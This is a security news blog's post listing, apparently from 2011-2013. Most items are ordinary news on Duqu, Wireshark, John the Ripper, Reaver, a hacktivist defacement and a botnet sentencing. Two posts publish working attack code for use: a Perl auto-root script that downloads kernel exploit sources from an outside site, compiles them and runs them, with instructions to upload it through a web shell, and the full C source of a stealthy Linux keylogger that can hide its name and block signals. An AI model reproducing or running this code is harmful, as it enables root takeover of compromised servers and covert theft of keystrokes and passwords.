Posted by Avik Sarkar
On 7/22/2011 02:38:00 pm
Shak-Attack.pl V.1 is a Linux root exploit designed By Shak from Pakistan Cyber Army (PCA) in Perl coding.
According to Shak:-
"...I found this useful in hacking , so i released my first auto root Perl exploit ,
i name this to Shak-attack.pl
Usage :-
save the below code in text document , and then save as to shak-attack.pl
upload it through shell , change the permission to 777 , and run it by using this command
perl shak-attack.pl
i have added some new Linux local root in it , will release the v2.0 version s00n ,
as I am working on other new Linux exploits , will add them as well ,
and also will add some other tools in this script !
this is a public version ! feel free to use it , if you have any error , let me know !
regards ,
<=Shak=>........"
Shak-Attack.pl V.1 Code:-
#!/usr/bin/perl
############################################
#shak-attack.pl coded by <=Shak=> #
#Site: http://pakcyberarmy.net/
#Contact : hax_you_anytime@live.com
#Thankx to : z3r0 c0de , Shadow008 #
############################################
if ($ARGV[0] =~ "root" )
{
system("wget http://pakcyberarmy.com/local/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://pakcyberarmy.com/local/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");
}
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 3/21/2012 04:26:00 am
Duqu Mystery Finally Solved By Researcher at Kaspersky Lab
After so many drama finally the deep mystery of
DUQU solved. Researcher at kaspersky lab has found out that this dangerous stuxnet was written by
custom object oriented C called “OO C”. The mystery began earlier this month, when Kaspersky researchers struggled to determine what programming language had been used to develop the Duqu. So the researchers have taken the help of programming community to find out the truth. They got a wild feed back, 200 comments and 60+ e-mail messages with suggestions about possible languages and frameworks that could have been used for generating the Duqu Framework code.
Let us review the most popular suggestions:-
- Variants of LISP
- Forth
- Erlang
- Google Go
- Delphi
- OO C
- Old compilers for C++ and other languages
There are two main possibilities. The code was either written using a custom OO C framework, or it was entirely written in OO C manually, without any language extensions.No matter which of these two variants is true, the implications are impressive. The Payload DLL contains 95 Kbytes of event-driven code written with OO C, a language that has no automatic memory management or safe pointers was pointed out by Kaspersky’s Igor Soumenkov.“This kind of programming is more commonly found in complex ‘civil’ software projects, rather than contemporary malware. Additionally, the whole event-driven architecture must have been developed as a part of the Duqu code or its OOC extension.” said Mr Igor
This made an assumption that the developers are old school and don’t trust C++. That’s why they relied on C. Another reason for using OO C is because back in the good old days it was more portable than C++. Duqu was created by a professional team that wrote the framework based on old code. To know the full story click
here.
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 1/24/2012 05:20:00 pm
Reaver 1.4- Wifi Protected Setup (WPS) Brute Forcer Released
Earlier we have discussed about a tool named
Reaver. An Austrian information security student and researcher
Stefan Viehböck released details of a vulnerability in the WiFi Protected Setup (WPS) standard that enables attackers to recover the router PIN, a security firm has published an open-source tool capable of exploiting the vulnerability. The tool, known as
Reaver, has the ability to find the WPS PIN on a given router and then recover the WPA passphrase for the router, as well. Now we have the next version
Reaver 1.4.
List Of Changes In Reaver 1.4:-
- Updated reaver and wash usage, reverted last wash update (unecessary).
- Wash now processes data even if received on the wrong channel.
- Added BSSID to session restore prompt.
- Fixed wash pcap parsing bug.
- Updated exchange.c to timeout properly if –no-nacks is specified.
- Added –no-nacks option for APs that repeatedly send multiple WPS response packets.
- Added –exec option to run a specified command upon successful completion.
- Fixed –session bug.
- Added RSSI output to wash.
- Fixed makefile bug.
- Fixed bug in pins.c introduced in r95. Pins no longer randomized.
- Added sanity checks for out of order packets to message processing in exchange.c
- Fixed null pointer reference bug.
- Reverted association supported and extended rates to original values.
- Re-work of the message processing functions, primarily in exchange.c
- Added -p option to mkdir in makefile.
- Added sanity checks to ensure that WPS messages are sent in the proper order.
- Fixed arg parsing bug.
- Updated Makefile, changed ‘walsh’ to ‘wash’. Added wash documentation.
- Fixed bug in auto-detection of WSC_NACK support.
- Fixed channel hopping bug. Now WSC_NACKs are always sent to ensure WPS session termination.
- Supported rates in association packets now reflect the supported rates in the AP’s beacon packets. AP beacons are now always parsed prior to reassociation to ensure we are still on the right channel.
- Fixed database permissions bug in Reaver Makefile
- Fixed walsh channel bug. Added sanity checks in exchange.c before setting progress status to KEY2_DONE.
- Fixed overflow in parse_beacon_tags.
- Fixed logic bug where SEND_M2D status was interpreted as a RECV_DONE status.
- Fixed memory leaks.
- Fixed bug in generating proper WPS messages (resulted in false negatives). Added verbose message status output.
- wpsmon char c => int c.
- Documentation updates.
- Fixed Makefile bug.
- Fixed session saved output bug.
- Updated session.c to always print restore session prompt to stderr.
- Updated Makefile, configure script and #defines to ensure that –prefix is honored.
- Fixed makefile not properly installing to specified prefix.
- Removed dev debug flag
- Enabled debug output for troubleshooting issues; don’t use unless you want lots of debug output (this will be made a command line option in the near future…)
- Updated walsh WPS lock status display. Fixed file permission bug in Makefile. Removed old code in libwps/.
- Updated walsh to display more useful info. Removed adaptive delay feature.
- Added adaptive lockout sleep times, added -ldl to LDFLAGS
For Additional Information & To Download Reaver Click Here
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 1/08/2013 02:51:00 pm
Official Website of Senator Vicente C. Sotto III Hacked By Anonymous Philippines
Philippines rampage of hacktivist
Anonymous continues, as this hacker collective group strikes again and blown the official website of
Senator Vicente C. Sotto III. This attack carried under the banner of
'OccupyPhilippines' where the hacker group hacked into server of Senator Tito Sotto and defaced the index page. According to the hacker, the cyber attack was to stand against the controversial
"Cybercrime Prevention Act of Philippines" widely known as
Republic Act No. 10175. The hacker group believed that, if this bill did not get revised, then the freedom of speech in cyber space will be restricted. During this attack the hacker tried to send his message to the Senator, and that is -
"It's been a long time, Tito Sen! Deny us our freedom of speech and of expression through R.A. 10175
and we will deny you your cyberspace. You cannot shut us up, you cannot shut us down.
And you shall not see us rest until R.A. 10175 is revised.
We are all waiting, we are all ready.
We are Anonymous, we are legion.
We do not forgive and we do not forget.
Expect Us
Protect our Right to Freedom of Expression!..."
The attack took place in yesterday evening, as soon as the intrusion was spotted the site was sent offline for a certain period. And today morning, the whole thing get restored and it came back to its normal format.
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 5/08/2011 09:50:00 pm
Targeted/semi-targeted attacks have been utilizing exploits against Microsoft's "RTF Stack Buffer Overflow Vulnerability" (CVE-2010-3333) since last December. The vulnerability was patched last November in security bulletin MS10-087.
Many of the attacks we've seen which exploit CVE-2010-333 have used topical subject lines.
And this week is no different. So of course, there's an Osama bin Laden RTF exploit circulating in the wild which uses the subject: "FW: Courier who led U.S. to Osama bin Laden's hideout identified".
The file name is called: "Laden's Death.doc" and appears as so:
When the RTF file is opened, the exploit executes shellcode and drops a file named server.exe inside C:/RECYCLER and executes it.
C:/RECYCLER/server.exe does the following:
• Drops a file in the system's temp folder: vmm2.tmp
• File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll
• Makes registry modifications in an attempt to hijack the DHCP service.
It attempts to connect to a C&C hosted at ucparlnet.com.
The payload has the ability to:
• Download additional malware
• Connect and send sensitive data back to remote servers
• Act as a trojan proxy server
The folks at contagio malware dump report that "It was sent to many targets in the US Government today".
Checking our back end shows that some of our customers have also been exposed. Our detection name for the exploit is Exploit:W32/Cve-2010-3333.G and the RTF payload is detected as Trojan:W32/Agent.DSKA.
As always, the usual advice applies, exercise caution when opening attachments, patch/update your MS Word/Office, and make sure your antivirus is up to date.
You can see more examples of CVE-2010-3333 attacks at contagio.
Updated to add: Here's a picture of an email spreading this document. This was sent to analysts in Washington, D.C. The picture was published by Lotta Danielsson-Murphy. Do note that the sender information in the email is forged.
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 7/10/2011 09:49:00 pm
NUXKEYLOGGER VERSION 1.3 is an effective Key Logger For LINUX systems.
Brief Description:-
Nux Keylogger monitors keyboard activity on a Linux system. It's possible to hide and daemonize this process and it supports azerty and qwerty keyboard modes.
Author:- Vilmain Nicolas (C) 2010, 2011 (null.sim@gmail.com)
Licence:-
This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
Source Code of Nuxkeylogger Version 1.3:-
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <dirent.h>
#include <sys/select.h>
#include <linux/input.h>
#define DF_PATH_LOG "/tmp/.Xsys"
#define PATH_KEYBOARD_FILE "/dev/input/by-path/"
#define VERSION_STR "nuxkeylogger version 1.3"
#define PATH_LEN 1024
#define SIZE_TAB_KEY_AZERTY sizeof (tab_key_azerty)
#define SIZE_TAB_KEY_QWERTY sizeof (tab_key_qwerty)
struct fdlist_s
{
int *fdtab;
int n;
int *p_lastfd;
int fdlog;
};
void checkuid (void);
void decode_nuxkeylogger_options (int argc, char **argv, char **pathlog);
void version (void);
void usage (void);
void out_memory (const char *type);
char * xstrdup (const char *str);
void hide (int argc, char **argv, const char *name);
void block_signal (void);
void daemonize (void);
int get_keyboard_fd (struct fdlist_s *fl);
int open_fd_log (char *pathlog, int *fd);
void loop_keyboard_key (struct fdlist_s *fl);
int write_key (int fd, int fdlog);
void free_fdlist (struct fdlist_s *fl);
static const char *tab_key_azerty[] =
{
"<ESC>", "&", "é", "\"", "'", "(", "-", "è", "_",
"ç", "à ", ")", "=", "<BACKSPACE>", "<TAB>", "a",
"z", "e", "r", "t", "y", "u", "i", "o","p", "^",
"$", "<ENTER>\n", "<CTRL>", "q", "s", "d", "f", "g", "h",
"j", "k", "l", "m", "ù", "²", "<SHIFT>", "*", "w",
"x", "c", "v", "b", "n", ",", ";", ":", "!", "<SHIFT>",
"*", "<ALT>", " ", "", "<F1>", "<F2>", "<F4>",
"<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>", "",
"<VerNum>", "", "7", "8", "9", "-", "4", "5", "6",
"+", "1", "2", "3", "0", "<?>", "", "", "<", "<F11>",
"<F12>", "", "", "", "", "", "", "", "", "", "/", "",
"<ALTGr>", "", "", "<Up>", "<UP>", "<Left>", "<Right>",
"<END>", "<Down>", "<DOWN>", "", "<DEL>", "", "", "",
"", "", "", "", "", "", "", "", "", "", "<META>"
};
static const char *tab_key_qwerty[] =
{
"<ESC>", "!", "@", "#", "$", "%", "^", "&", "*",
"(", ")", "_", "=", "<BACKSPACE>", "<TAB>", "q",
"w", "e", "r", "t", "y", "u", "i", "o", "p",
"[", "]", "<ENTER>\n", "<CTRL-LEFT>", "a", "s", "d",
"f", "g", "h", "j", "k", "l", ";", "'", "`", "",
"\\", "z", "x", "c", "v", "b", "n", "m", ",", "",
"", "", "", "ALT", " ", "", "<F1>", "<F2>", "<F3>",
"<F4>", "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>",
"", "", "7","8", "9", "-", "4", "5", "6", "+", "1", "2",
"3", "0", ".", "", "", "<", "<F11>", "<F12>", "", "",
"", "", "", "", "", "<ENTER-RIGHT>", "<CTRL-RIGHT>", "",
"", "<AltGR>", "", "", "<Up>", "", "<LEFT>", "", "<RIGHT>",
"", "<DOWN>", "", "", "", "", "", "", "", ""
};
char **tab_key;
int
main (int argc, char **argv)
{
struct fdlist_s fl;
char *pathlog = NULL;
checkuid ();
memset (&fl, 0, sizeof (struct fdlist_s));
fl.fdlog = -1;
tab_key = (char **) tab_key_azerty;
decode_nuxkeylogger_options (argc, argv, &pathlog);
if (get_keyboard_fd (&fl)
|| open_fd_log (pathlog, &fl.fdlog) == -1)
{
free_fdlist (&fl);
return EXIT_FAILURE;
}
loop_keyboard_key (&fl);
free_fdlist (&fl);
return EXIT_SUCCESS;
}
void
checkuid (void)
{
if (getuid ())
{
fprintf (stderr, "WARNING: need root!\n");
exit (EXIT_SUCCESS);
}
}
void
decode_nuxkeylogger_options (int argc, char **argv, char **pathlog)
{
char opt;
char *name = NULL;
static struct option const long_options[] =
{
{"help", no_argument, 0, 'h'},
{"version", no_argument, 0, 'v'},
{"daemonize", no_argument, 0, 'd'},
{"block-signals", no_argument, 0, 's'},
{"mode-qwerty", no_argument, 0, 'Q'},
{"mode-azerty", no_argument, 0, 'A'},
{"hidden", required_argument, 0, 'i'},
{"path-log", required_argument, 0, 'p'},
{0, 0, 0, 0}
};
do
{
opt = getopt_long (argc, argv, "hvdsAQi:p:", long_options, NULL);
switch (opt)
{
case 'h':
usage ();
break;
case 'v':
version ();
break;
case 'i':
name = argv[optind - 1];
break;
case 'd':
daemonize ();
break;
case 's':
block_signal ();
break;
case 'A':
tab_key = (char **) tab_key_azerty;
break;
case 'Q':
tab_key = (char **) tab_key_qwerty;
break;
case 'p':
*pathlog = xstrdup (optarg);
break;
}
}
while (opt != -1);
if (name)
hide (argc, argv, name);
}
void
version (void)
{
puts (VERSION_STR);
exit (EXIT_SUCCESS);
}
void
usage (void)
{
printf ("Warning, in \"qwerty\" mode, it's possibility to error key-mapp\n"
"arguments list:\n\r"
" -H, --help print usage and exit program\n\r"
" -V, --version print program_version and exit\r\n"
" -d, --daemonize exec program in background\r\n"
" -s, --block-signal block all signal\r\n"
" -Q, --mode-qwerty keyboard in qwerty mode\r\n"
" -A, --mode-azerty keyboard in azerty mode"
"(by default)\r\n"
" -i, --hidden [NEW NAME] change program name\r\n"
" -p, --path-log [PATH] name for output log file\r\n");
exit (EXIT_SUCCESS);
}
void
out_memory (const char *type)
{
fprintf (stderr, "%s: memory exhausted\n", type);
exit (EXIT_FAILURE);
}
char *
xstrdup (const char *str)
{
char *copy = NULL;
copy = strdup (str);
if (!copy)
out_memory ("strdup");
return copy;
}
void
hide (int argc, char **argv, const char *name)
{
char *newname = NULL;
newname = xstrdup (name);
for (; argc; argc--)
memset (argv[argc - 1], 0, strlen (argv[argc - 1]));
strcpy (argv[0], newname);
free (newname);
}
void
block_signal (void)
{
int *p_sig = NULL;
static const int sigtab[] =
{
SIGUSR1, SIGUSR2, SIGINT, SIGPIPE, SIGQUIT,
SIGTERM, SIGTSTP, SIGHUP, SIGILL, SIGABRT,
SIGFPE, SIGSEGV, SIGALRM, SIGCHLD, SIGCONT,
SIGTTIN, SIGTTOU, 0
};
p_sig = (int *) sigtab;
do
signal (*p_sig, SIG_IGN);
while (*++p_sig);
}
void
daemonize (void)
{
pid_t pid;
pid = fork ();
if (pid == -1)
{
perror ("fork");
exit (EXIT_FAILURE);
}
else if (pid)
exit (EXIT_SUCCESS);
}
int
get_keyboard_fd (struct fdlist_s *fl)
{
struct dirent *ent = NULL;
DIR *dir = NULL;
char path[PATH_LEN];
dir = opendir (PATH_KEYBOARD_FILE);
if (!dir)
{
fprintf (stderr, "opendir: %s\n", strerror (errno));
return -1;
}
for (;;)
{
ent = readdir (dir);
if (!ent)
break;
if (strstr(ent->d_name, "-kbd"))
{
memset (path, 0, PATH_LEN);
snprintf (path, (PATH_LEN - 1), "%s%s",
PATH_KEYBOARD_FILE, ent->d_name);
fl->n++;
fl->fdtab = realloc (fl->fdtab, (fl->n * sizeof (int)));
fl->fdtab[fl->n - 1] = open (path, O_RDONLY);
if (fl->fdtab[fl->n - 1] == -1)
{
fprintf (stderr, "open(%s): %s", path, strerror (errno));
closedir (dir);
return -1;
}
}
}
closedir (dir);
fl->p_lastfd = &fl->fdtab[fl->n - 1];
return 0;
}
int
open_fd_log (char *pathlog, int *fd)
{
char *p_log = NULL;
p_log = (pathlog) ? pathlog : DF_PATH_LOG;
*fd = open (p_log, O_WRONLY | O_CREAT | O_APPEND);
if (*fd == -1)
fprintf (stderr, "open(%s): %s\n", p_log, strerror (errno));
if (pathlog)
free (pathlog);
return *fd;
}
void
free_fdlist (struct fdlist_s *fl)
{
int i;
if (fl->fdtab)
{
for (i = 0; i < fl->n; i++)
{
if (fl->fdtab[i] != -1)
close (fl->fdtab[i]);
}
free (fl->fdtab);
}
if (fl->fdlog != -1)
close (fl->fdlog);
}
void
loop_keyboard_key (struct fdlist_s *fl)
{
int n;
int ret;
fd_set setread;
for (;;)
{
FD_ZERO (&setread);
for (n = 0; n < fl->n; n++)
FD_SET (fl->fdtab[n], &setread);
ret = select (*fl->p_lastfd + 1, &setread, NULL, NULL, NULL);
if (ret == -1)
return;
else if (ret)
{
for (n = 0; n < fl->n; n++)
if (FD_ISSET (fl->fdtab[n], &setread))
{
if (write_key (fl->fdtab[n], fl->fdlog) == -1)
return;
}
}
}
}
int
write_key (int fd, int fdlog)
{
struct input_event ev;
char *key = NULL;
if (read(fd, &ev, sizeof(struct input_event))
== sizeof(struct input_event))
{
if ((ev.value == EV_KEY || ev.value == 2)
&& (ev.code - 1) > -1 && (ev.code - 1) < 118)
{
key = tab_key[ev.code - 1];
if (write (fdlog, key, strlen (key)) == -1)
return -1;
}
}
return 0;
}
For Installation:-
$ gcc -o nuxkeylogger nuxkeylogger.c -W -Wall
# ./nuxkeylogger --help
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 6/24/2011 04:45:00 pm
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes.
What is new in John the Ripper 1.7.8 :-
The bitslice DES S-box expressions have been replaced with those generated by Roman Rusakov specifically for John the Ripper. The corresponding assembly
code for x86 with MMX, SSE2, and for x86-64 with SSE2 has been re-generated. For other CPUs and for AVX/XOP, C compilers do a reasonably good job of generating the code from the supplied C source files (with intrinsics where relevant). The S-box expressions that we were using before had a 21% larger gate count, so theoretically this could provide a 21% speedup. In practice, though, a 12% to 14% speedup at DES-based crypt(3) hashes is typical. This effort has been sponsored by Rapid7
Corrected support for bcrypt (OpenBSD Blowfish) hashes of passwords containing non-ASCII characters (that is, characters with the 8th bit set). Added support for such hashes produced by crypt_blowfish up to 1.0.4, which contained a sign extension bug (inherited from older versions of John). The old buggy behavior may be enabled per-hash, using the “$2x$” prefix.
The external mode virtual machine’s performance has been improved through additional multi-op instructions matching common instruction sequences
(assign-pop and some triple- and quad-push VM instructions were added).
A few minor bug fixes and enhancements were made.
This release comes with an 17% improvement in gate count for the Data Encryption Standard (DES) algorithm by generating different S-box expressions targeting both typical CPUs with only basic instructions and CPUs/GPUs that have “bit select” instructions.
Download John the Ripper v1.7.8 HERE
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 1/14/2012 11:33:00 pm
Earlier we have several times talked about
Wireshark. It is the world’s most popular network protocol analyzer. It is used for troubleshooting, analysis, development, and education. Wireshark is widely used by system admins and also cyber criminals as because Wireshark has the capability to sniffing packets.
Official Change Log:-
Bug Fixes:-
- wnpa-sec-2012-01: Laurent Butti discovered that Wireshark failed to properly check record sizes for many packet capture file formats. (Bug 6663, bug 6666, bug 6667, bug 6668, bug 6669, bug 6670)
- wnpa-sec-2012-02: Wireshark could dereference a NULL pointer and crash. (Bug 6634)
- wnpa-sec-2012-03: The RLC dissector could overflow a buffer. (Bug 6391)
- “Closing File!” Dialog Hangs. (Bug 3046)
- Sub-fields of data field should appear in exported PDML as children of the data field instead of as siblings to it. (Bug 3809)
- Incorrect time differences displayed with time reference set. (Bug 5580)
- Wrong packet type association of SNMP trap after TFTP transfer. (Bug 5727)
- SSL/TLS decryption needs wireshark to be rebooted. (Bug 6032)
- Export HTTP Objects -> save all crashes Wireshark. (Bug 6250)
- Wireshark Netflow dissector complains there is no template found though the template is exported. (Bug 6325)
- DCERPC EPM tower UUID must be interpreted always as little endian. (Bug 6368)
- Crash if no recent files. (Bug 6549)
- IPv6 frame containing routing header with 0 segments left calculates wrong UDP checksum. (Bug 6560)
- IPv4 UDP/TCP Checksum incorrect if routing header present. (Bug 6561)
- Incorrect Parsing of SCPS Capabilities Option introduced in response to bug 6194. (Bug 6562)
- Various crashes after loading NetMon2.x capture file. (Bug 6578)
- Fixed compilation of dumpcap on some systems (when MUST_DO_SELECT is defined). (Bug 6614)
- SIGSEGV in SVN 40046. (Bug 6634)
- Wireshark dissects TCP option 25 as an “April 1″ option. (Bug 6643)
- ZigBee ZCL Dissector reports invalid status. (Bug 6649)
- ICMPv6 DNSSL option malformed on padding. (Bug 6660)
- Wrong tvb_get_bits function call in packet-csn1.c. (Bug 6708)
- [UDP] – Length Field of Pseudo Header while computing CheckSum is not correct. (Bug 6711)
- pcapio.c: bug in libpcap_write_interface_description_block. (Bug 6719)
- Memory leaks in various dissectors.
- Bytes highlighted in wrong Byte pane when field selected in Details pane.
Updated Protocol Support:-
BGP, BMC CSN1, DCERPC EPM, DCP(ETSI) DMP DTLS GSM Management, H245 HPTEAM, ICMPv6, IEEE 802.15.4 IPSEC IPv4, IPv6, ISAKMP KERBEROS LDSS NFS RLC, RPC-NETLOGON RRC RTMPT SIGCOMP SSL SYSLOG TCP, UDP, XML ZigBee ZCL
New and Updated Capture File Support:-
Accellent 5Views, AIX iptrace, HP-UX nettl, I4B, Microsoft Network Monitor, Novell LANalyzer, PacketLogger, Pcap-ng, Sniffer, Tektronix K12, WildPackets {Airo,Ether}Peek.
To Download Wireshark Click Here
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 9/12/2011 08:44:00 pm
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 4/11/2012 06:36:00 pm
Duqu is Still in Operation, Researcher Found New Duqu Variant
Last month researchers at Kaspersky Lab managed to solve the Duqu Mystery. They discovered that this dangerous stuxnet was written by custom object oriented C called “OO C”. But was the sufficient to stop this dangerous cyber weapon? The answer is big no, and today a new Duqu variant rise up, which clearly indicating that the attacks are still ongoing and still security experts failed to put a solid brick between Duqu & cyber space. The latest Duqu driver was compiled in February 2012, more than four months after Duqu was first flagged as a unique piece of malware “striking similarities” to Stuxnet, the mysterious computer worm that targeted nuclear facilities in Iran. Symantec identified the newly compiled Duqu driver as mcd9×86.sys and said it contains no new functionality beyond spying and collecting data from infected machines. Kaspersky Lab’s Costin Raiu says the latest variant has been engineered to escape detection by the open-source Duqu detector toolkit released by CrySyS Lab.
-Source (ZDnet)
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 5/19/2011 03:11:00 pm
Fabrice Bellard has released a JavaScript program that can run Linux in a Web browser window.
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 9/11/2012 12:05:00 am
Hacker Sentenced to 30 Months in Prison for Selling Access to Botnets & Infecting 72,000 PCs
A 30-year old computer hacker received a
thirty month in prison sentence for creating a
botnet and a charge of violating the
Computer Fraud and Abuse Act. According to
Depertment of Justice -
Joshua Schichtel, of Phoenix, was sentenced today to 30 months in prison for selling command-and-control access to and use of thousands of malware-infected computers, announced Assistant Attorney General Lanny A. Breuer of the Justice Department’s Criminal Division and U.S. Attorney for the District of Columbia Ronald C. Machen Jr.
Schichtel was sentenced by Chief U.S. District Judge Royce C. Lamberth in the District of Columbia. In addition to his prison term, Schichtel was ordered to serve three years of supervised release.
Schichtel entered a
guilty plea on Aug. 17, 2011, to one count of attempting to cause damage to multiple computers without authorization by the transmission of programs, codes or commands, a violation of the Computer Fraud and Abuse Act.
According to court documents, Schichtel sold access to
“botnets,” which are networks of computers that have been infected with a malicious computer program that allows unauthorized users to control infected computers. Individuals who wanted to infect computers with various different types of malicious software (
malware) would contact Schichtel and pay him to install, or have installed, malware on the computers that comprised those botnets. Specifically, Schichtel pleaded guilty to causing software to be installed on
approximately 72,000 computers on behalf of a customer who paid him
$1,500 for use of the botnet.
This case was investigated by the Washington Field Office of the
FBI. The case is being prosecuted by Corbin Weiss, Senior Counsel in the Criminal Division’s Computer Crime and Intellectual Property Section and Special Assistant U.S. Attorney for the District of Columbia.
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
Posted by Avik Sarkar
On 3/29/2012 12:53:00 am
Notepad++ 6 (Open-Source Text Editor) Released With New Features
One of the most famous and widely used source code editor for windows, Notepad++ now have version 6. The tool is written in C++ and supports plugins, macros, and text highlighting for many programming languages including C, C++, C#, Visual Basic, Java, Lua, Python, Perl, SQL, HTML and XML.
Newest Features:-
- PCRE (Perl Compatible Regular Expressions) is supported.
- Add Document Map feature (via Menu View->Document Map)
- Enhance the loading performance for the large file
Included plugins (Unicode):-
Note that Notepad++ Document Map is only available in Unicode release. The source code for ANSI release is not maintained anymore, therefore ANSI binary will be removed in the future releases. As usual, if you find any critical problem, please post in
hereTo Download
Notepad++ (Installer, Zip, Binary Source Code) Click
Here
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
